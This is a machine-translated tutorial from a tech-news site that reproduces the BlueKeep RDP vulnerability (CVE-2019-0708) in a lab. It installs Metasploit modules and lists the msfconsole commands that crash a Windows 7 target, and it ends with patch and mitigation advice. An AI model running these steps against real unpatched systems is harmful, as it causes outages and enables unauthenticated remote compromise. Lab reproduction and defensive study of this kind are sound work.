Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze RDP's ultimate EXP blast vulnerability CVE-2019-0708, which is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Overview of 0x00 vulnerabilities

CVE-2019-0708 is a serious RDP remote code execution vulnerability released by Microsoft on May 14, 2019. This vulnerability does not require authentication and user interaction and can lead to a worm outbreak with an impact comparable to that of wannycry.

September 07, 2019, @ rapid7 publicly released the CVE-2019-0708 exploitation module in its metasploit-framework repository. Vulnerability exploitation tools have begun to spread and become a worm-level attack threat.

0x01 affects version

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Users of Windows 8 and Windows 10 and later are not affected by this vulnerability

Principle of 0x02 vulnerability

The UAF vulnerability is caused by the re-use of the object pointer after it is released, as detailed in

Https://www.anquanke.com/post/id/181577

0x03 environment building

Environmental preparation:

Win7 sp1-192.168.152.139

Kali 2019.4-192.168.152.138

1.win7 sp1 prepares:

Open 3389:

Open the control panel, select system and Security, select system, click remote Settings, pop up system Properties, click remote, and select a computer connection on the remote Desktop that allows any version of the remote Desktop to run (less secure).

2.Win+r, enter the cmd command, enter netstat-ano to view the port status, you can see that the 3389 status is listening.

3. Modify the registry:

Win + R enter regedit into Registry Editor, click the following directory to find fDisableCam and change the value to 0

HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control

\ TerminalServer\ Winstations\ RDP-Tcp\ fDisableCam = 0

4. Open kali:

Kali2019 version of the files you need to download

You can see files with four .rb suffixes, and then put them in the appropriate directory (the rdp directory needs to be created by yourself)

Rdp.rb / usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd

Rdp_scanner.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

Cve_2019_0708_bluekeep.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Cve_2019_0708_bluekeep_rce.rb / usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

5. Check to see if the file was copied successfully

Cd / usr/share/metasploit-framework/lib/msf/core/exploit/

Cd / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

Cd / usr/share/metasploit-framework/modules/exploit/windows/rdp/

Recurrence of 0x04 vulnerabilities

1. Start msf:

Msfconsole

two。 Reload all modules (important):

Command: reload_all

3. Search vulnerability module

Search 2019_0708

Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce / / use attack module

Set rhosts 192.168.152.139 / / set target host (win7 sp1)

Set rport 3389 / / set target port

Set target 3

4.Run executes win7 sp1 blue screen

0x05 vulnerability repair

1. Make the security patch of the corresponding system in time

two。 Close port 3389 or add a firewall security policy to restrict access to port 3389

3. If you can't patch it, you can turn on remote Desktop (Network level Authentication (NLA)) to temporarily prevent vulnerabilities.

The above content is how to analyze RDP's ultimate EXP blast vulnerability CVE-2019-0708. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.